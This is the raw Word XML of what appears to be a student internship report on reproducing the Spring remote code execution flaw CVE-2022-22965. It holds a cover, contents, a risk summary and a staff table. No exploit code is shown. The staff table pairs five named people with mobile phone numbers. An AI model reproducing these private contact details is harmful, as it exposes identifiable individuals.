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A5F0" w14:textId="77777777" w:rsidR="008F6264" w:rsidRDefault="008F6264">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="062AE1BA" w14:textId="77777777" w:rsidR="008F6264" w:rsidRDefault="008F6264"/>
    <w:p w14:paraId="362241A9" w14:textId="77777777" w:rsidR="008F6264" w:rsidRDefault="008F6264"/>
    <w:p w14:paraId="5B3DC6DC" w14:textId="77777777" w:rsidR="008F6264" w:rsidRDefault="008F6264">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C02D749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440A04E7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4F6AF5A6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555EB214" w14:textId="77777777" w:rsidR="008F6264" w:rsidRDefault="008F6264">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2CE27BC3" w14:textId="77777777" w:rsidR="008F6264" w:rsidRDefault="008F6264">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07B2C128" w14:textId="77777777" w:rsidR="008F6264" w:rsidRDefault="008F6264">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FA8E2C9" w14:textId="77777777" w:rsidR="008F6264" w:rsidRDefault="008F6264">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D112F42" w14:textId="77777777" w:rsidR="008F6264" w:rsidRDefault="008F6264">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="574EC2BA" w14:textId="77777777" w:rsidR="008F6264" w:rsidRDefault="008F6264">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03914BEA" w14:textId="77777777" w:rsidR="008F6264" w:rsidRDefault="008F6264">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="781A0A86" w14:textId="77777777" w:rsidR="008F6264" w:rsidRDefault="008F6264">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A12B191" w14:textId="77777777" w:rsidR="008F6264" w:rsidRDefault="008F6264">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A32B6F4" w14:textId="77777777" w:rsidR="008F6264" w:rsidRDefault="008F6264">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66A1A014" w14:textId="77777777" w:rsidR="008F6264" w:rsidRDefault="008F6264">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61871F9E" w14:textId="77777777" w:rsidR="008F6264" w:rsidRDefault="008F6264">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17D4D002" w14:textId="77777777" w:rsidR="008F6264" w:rsidRDefault="008F6264"/>
    <w:p w14:paraId="5A3CADDF" w14:textId="77777777" w:rsidR="008F6264" w:rsidRDefault="008F6264"/>
    <w:p w14:paraId="64E73959" w14:textId="77777777" w:rsidR="008F6264" w:rsidRDefault="008F6264">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="158FF668" w14:textId="77777777" w:rsidR="008F6264" w:rsidRDefault="008F6264">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4EECBCE9" w14:textId="77777777" w:rsidR="008F6264" w:rsidRDefault="008F6264">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B181B45" w14:textId="77777777" w:rsidR="008F6264" w:rsidRDefault="008F6264">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16DB2419" w14:textId="77777777" w:rsidR="008F6264" w:rsidRDefault="008F6264">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70049AA3" w14:textId="77777777" w:rsidR="008F6264" w:rsidRDefault="008F6264"/>
    <w:p w14:paraId="7BAD4AF5" w14:textId="69EB438D" w:rsidR="008F6264" w:rsidRDefault="00AA5F05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 w:rsidR="00BC2024">
        <w:rPr>
          <w:rFonts w:cstheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="majorEastAsia" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>年</w:t>
      </w:r>
      <w:r w:rsidR="00BC2024">
        <w:rPr>
          <w:rFonts w:cstheme="majorEastAsia" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidR="00BC2024">
        <w:rPr>
          <w:rFonts w:cstheme="major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 w:rsidR="00BC2024">
        <w:rPr>
          <w:rFonts w:cstheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>26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4221A100" w14:textId="77777777" w:rsidR="008F6264" w:rsidRDefault="00AA5F05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1F2A4A8E" w14:textId="77777777" w:rsidR="008F6264" w:rsidRDefault="00AA5F05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347ADCFD" w14:textId="77777777" w:rsidR="008F6264" w:rsidRDefault="00AA5F05">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8306"/>
            </w:tabs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2848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漏洞复现结论（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_Toc28487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87CA09D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481" w:history="1">
            <w:r w:rsidR="00AA5F05">
              <w:t>1.1</w:t>
            </w:r>
            <w:r w:rsidR="00AA5F05">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>风险等级分布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_Toc7481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102A848D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24528" w:history="1">
            <w:r w:rsidR="00AA5F05">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>2.</w:t>
            </w:r>
            <w:r w:rsidR="00AA5F05">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>工作计划（</w:t>
            </w:r>
            <w:r w:rsidR="00AA5F05">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>25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_Toc24528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4A2BBCB6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39" w:history="1">
            <w:r w:rsidR="00AA5F05">
              <w:t>2.1</w:t>
            </w:r>
            <w:r w:rsidR="00AA5F05">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>工作人员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_Toc13939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0AF3616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137" w:history="1">
            <w:r w:rsidR="00AA5F05">
              <w:t>2.2</w:t>
            </w:r>
            <w:r w:rsidR="00AA5F05">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>漏洞对象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_Toc3137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35EC19E9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909" w:history="1">
            <w:r w:rsidR="00AA5F05">
              <w:t>2.3</w:t>
            </w:r>
            <w:r w:rsidR="00AA5F05">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>漏洞复现阶段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_Toc7909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3DAADEA7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60" w:history="1">
            <w:r w:rsidR="00AA5F05">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>2.4</w:t>
            </w:r>
            <w:r w:rsidR="00AA5F05">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>风险等级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_Toc1860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5F2C92CB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6133" w:history="1">
            <w:r w:rsidR="00AA5F05">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>3.</w:t>
            </w:r>
            <w:r w:rsidR="00AA5F05">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>漏洞复现过程（</w:t>
            </w:r>
            <w:r w:rsidR="00AA5F05">
              <w:t>3</w:t>
            </w:r>
            <w:r w:rsidR="00AA5F05">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>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_Toc6133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4C0865B0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532" w:history="1">
            <w:r w:rsidR="00AA5F05">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">3.1 </w:t>
            </w:r>
            <w:r w:rsidR="00AA5F05">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>风险管理及规避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_Toc18532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7931F902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033" w:history="1">
            <w:r w:rsidR="00AA5F05">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>3.</w:t>
            </w:r>
            <w:r w:rsidR="00AA5F05">
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="00AA5F05">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>测试方法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_Toc4033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0D2ACD6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445" w:history="1">
            <w:r w:rsidR="00AA5F05">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>3.</w:t>
            </w:r>
            <w:r w:rsidR="00AA5F05">
              <w:t>3</w:t>
            </w:r>
            <w:r w:rsidR="00AA5F05">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>测试中所用的工具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_Toc28445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3E166559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12892" w:history="1">
            <w:r w:rsidR="00AA5F05">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">4. </w:t>
            </w:r>
            <w:r w:rsidR="00AA5F05">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>漏洞复现结果（</w:t>
            </w:r>
            <w:r w:rsidR="00AA5F05">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>25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_Toc12892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7C3AD002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666" w:history="1">
            <w:r w:rsidR="00AA5F05">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>4.1 POC</w:t>
            </w:r>
            <w:r w:rsidR="00AA5F05">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>插件编写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_Toc32666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774AE44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5120" w:history="1">
            <w:r w:rsidR="00AA5F05">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">4.2 </w:t>
            </w:r>
            <w:r w:rsidR="00AA5F05">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>漏洞信息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_Toc25120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0F241B89" w14:textId="77777777" w:rsidR="008F6264" w:rsidRDefault="00AA5F05">
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="774122F8" w14:textId="77777777" w:rsidR="008F6264" w:rsidRDefault="008F6264">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18E779E2" w14:textId="77777777" w:rsidR="008F6264" w:rsidRDefault="008F6264"/>
    <w:p w14:paraId="033B9B43" w14:textId="77777777" w:rsidR="008F6264" w:rsidRDefault="008F6264">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="156" w:after="156"/>
        <w:sectPr w:rsidR="008F626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C009BF" w14:textId="77777777" w:rsidR="008F6264" w:rsidRDefault="00AA5F05">
      <w:pPr>
        <w:pStyle w:val="1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0242A4E8" w14:textId="43AF84F6" w:rsidR="008F6264" w:rsidRDefault="007C0B17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南开大学实习实训第五组</w:t>
      </w:r>
      <w:r w:rsidR="00AA5F05">
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>的安全人员采用科学的漏洞复现步骤于</w:t>
      </w:r>
      <w:r w:rsidR="00AA5F05">
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="007D4FC3">
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>024</w:t>
      </w:r>
      <w:r w:rsidR="00AA5F05">
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>年</w:t>
      </w:r>
      <w:r w:rsidR="007D4FC3">
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>07</w:t>
      </w:r>
      <w:r w:rsidR="00AA5F05">
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>月</w:t>
      </w:r>
      <w:r w:rsidR="007D4FC3">
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>15</w:t>
      </w:r>
      <w:r w:rsidR="00AA5F05">
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>日至</w:t>
      </w:r>
      <w:r w:rsidR="00AA5F05">
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="007D4FC3">
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>024</w:t>
      </w:r>
      <w:r w:rsidR="00AA5F05">
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>年</w:t>
      </w:r>
      <w:r w:rsidR="007D4FC3">
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>07</w:t>
      </w:r>
      <w:r w:rsidR="00AA5F05">
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>月</w:t>
      </w:r>
      <w:r w:rsidR="007D4FC3">
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>26</w:t>
      </w:r>
      <w:r w:rsidR="00AA5F05">
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>日对</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>rin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>g</w:t>
      </w:r>
      <w:r w:rsidRPr="007B2A88">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>远程代码执行漏洞</w:t>
      </w:r>
      <w:r w:rsidR="007D4FC3">
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>等漏洞</w:t>
      </w:r>
      <w:r w:rsidR="00AA5F05">
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>进行了全面深入的漏洞复现。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51BD0B75" w14:textId="5C074D4F" w:rsidR="008F6264" w:rsidRDefault="00AA5F05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 w:rsidR="0093358E">
        <w:rPr>
          <w:rFonts w:cs="华文仿宋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 w:rsidR="0093358E">
        <w:rPr>
          <w:rFonts w:cs="华文仿宋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4714"/>
        <w:gridCol w:w="2213"/>
      </w:tblGrid>
      <w:tr w:rsidR="008F6264" w14:paraId="1893951E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5C6D63AB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6B9571A2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5F353DE0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8F6264" w14:paraId="433A67EE" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="712"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1595" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="06481CB2" w14:textId="03D8E857" w:rsidR="008F6264" w:rsidRDefault="000E35E9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17819AAE" w14:textId="70DDD644" w:rsidR="008F6264" w:rsidRDefault="007B2A88" w:rsidP="007D4FC3">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007B2A88">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Spring</w:t>
            </w:r>
            <w:r w:rsidRPr="007B2A88">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>远程代码执行漏洞</w:t>
            </w:r>
            <w:r w:rsidRPr="007B2A88">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>(CVE-2022-22965)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2213" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6217B9A9" w14:textId="58456AF3" w:rsidR="008F6264" w:rsidRDefault="007D4FC3" w:rsidP="007D4FC3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高危</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="79B0D370" w14:textId="77777777" w:rsidR="008F6264" w:rsidRDefault="00AA5F05">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="156" w:after="156"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc16656"/>
      <w:bookmarkStart w:id="5" w:name="_Toc5011"/>
      <w:bookmarkStart w:id="6" w:name="_Toc7481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0FAC6BFF" w14:textId="77777777" w:rsidR="008F6264" w:rsidRDefault="00AA5F05">
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>本次评估漏洞的详细风险等级分布如下：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7C0B17" w14:paraId="7DA5D5B2" w14:textId="77777777" w:rsidTr="00370FA1">
        <w:trPr>
          <w:trHeight w:val="312"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2500" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="3DA6A5CD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攻击路径</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2500" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="3D338C9A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远程</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007C0B17" w14:paraId="1922E4A4" w14:textId="77777777" w:rsidTr="00370FA1">
        <w:trPr>
          <w:trHeight w:val="312"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2500" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="5E040121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攻击复杂度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2500" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="5AAC2561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7C0B17" w14:paraId="1EE83CCE" w14:textId="77777777" w:rsidTr="00370FA1">
        <w:trPr>
          <w:trHeight w:val="312"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2500" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="6AAA185B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权限要求</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2500" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="1A753E6B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无需权限</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007C0B17" w14:paraId="4BD7E055" w14:textId="77777777" w:rsidTr="00370FA1">
        <w:trPr>
          <w:trHeight w:val="312"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2500" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="4E716B93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500" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="7038BDD7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全局影响</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007C0B17" w14:paraId="13341B4B" w14:textId="77777777" w:rsidTr="00370FA1">
        <w:trPr>
          <w:trHeight w:val="312"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2500" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="33C60734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数据保密性</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2500" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="4F0F2610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数据泄露</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007C0B17" w14:paraId="4DC1FCC4" w14:textId="77777777" w:rsidTr="00370FA1">
        <w:trPr>
          <w:trHeight w:val="312"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2500" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="5107B9CD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数据完整性</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2500" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="306FD819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传输被破坏</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007C0B17" w14:paraId="0383A9AB" w14:textId="77777777" w:rsidTr="00370FA1">
        <w:trPr>
          <w:trHeight w:val="312"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2500" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="260AC232" w14:textId="77777777" w:rsidR="007C0B17" w:rsidRDefault="007C0B17" w:rsidP="00370FA1">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>服务器危害</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2500" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="05C8CD96" w14:textId="5BEFE318" w:rsidR="007C0B17" w:rsidRDefault="00257C66" w:rsidP="00370FA1">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>被提取权限</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="64B7D64C" w14:textId="77777777" w:rsidR="008F6264" w:rsidRDefault="008F6264"/>
    <w:p w14:paraId="7BA51871" w14:textId="77777777" w:rsidR="008F6264" w:rsidRDefault="00AA5F05">
      <w:pPr>
        <w:pStyle w:val="1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9"/>
    </w:p>
    <w:p w14:paraId="7BD0CC42" w14:textId="77777777" w:rsidR="00FD6855" w:rsidRDefault="00AA5F05" w:rsidP="00FD6855">
      <w:pPr>
        <w:pStyle w:val="2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</w:rPr>
        <w:t>工作人员</w:t>
      </w:r>
      <w:bookmarkStart w:id="13" w:name="_Toc19764"/>
      <w:bookmarkStart w:id="14" w:name="_Toc18367"/>
      <w:bookmarkStart w:id="15" w:name="_Toc3137"/>
      <w:bookmarkEnd w:id="10"/>
      <w:bookmarkEnd w:id="11"/>
      <w:bookmarkEnd w:id="12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</w:tblGrid>
      <w:tr w:rsidR="00FD6855" w14:paraId="28143B0E" w14:textId="77777777" w:rsidTr="00370FA1">
        <w:trPr>
          <w:trHeight w:val="671"/>
        </w:trPr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8FADD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序号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C9F90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职务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8248C1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姓名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2DEE1B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联系方式</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FD6855" w14:paraId="56930562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2A593C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AE21C6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组长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526DA4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侯博文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44F5B6" w14:textId="23DBC4B1" w:rsidR="00FD6855" w:rsidRDefault="00F5126E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13022498745</w:t>
            </w:r>
            <w:r w:rsidR="00FD6855"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FD6855" w14:paraId="184B3641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25844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411679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07FDC4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陆皓喆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9F31EE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15058298819</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FD6855" w14:paraId="61EC6C10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6D1755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24E8CE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03E0E8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郝志成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7F55A" w14:textId="2DC57EB8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15063560713 </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FD6855" w14:paraId="61A40EB8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FA9115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4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9CA25A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0D3AB9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秦德龙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2B7DA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16622753767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FD6855" w14:paraId="5DE63CE3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D59197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5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3F4B83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40AB98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胡博浩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03B93D" w14:textId="77777777" w:rsidR="00FD6855" w:rsidRDefault="00FD6855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 18270856986</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1FE6BFBD" w14:textId="10F400D6" w:rsidR="008F6264" w:rsidRDefault="00AA5F05" w:rsidP="00FD6855">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="156" w:after="156"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/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72568202" w14:textId="3649EAEB" w:rsidR="008F6264" w:rsidRDefault="00523697">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r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ring Framework</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BC68A72" w14:textId="77777777" w:rsidR="008F6264" w:rsidRDefault="00AA5F05">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="156" w:after="156"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="_Toc33"/>
      <w:bookmarkStart w:id="17" w:name="_Toc5023"/>
      <w:bookmarkStart w:id="18" w:name="_Toc7909"/>
      <w:r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376"/>
      </w:tblGrid>
      <w:tr w:rsidR="008F6264" w14:paraId="30343B6F" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="432"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4343" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0ABA4435" w14:textId="77777777" w:rsidR="008F6264" w:rsidRDefault="00AA5F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26D7646C" w14:textId="77777777" w:rsidR="008F6264" w:rsidRDefault="00AA5F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8F6264" w14:paraId="01BA39EF" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="567"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4343" w:type="dxa"/>
            <w:vAlign w:val="center"/>
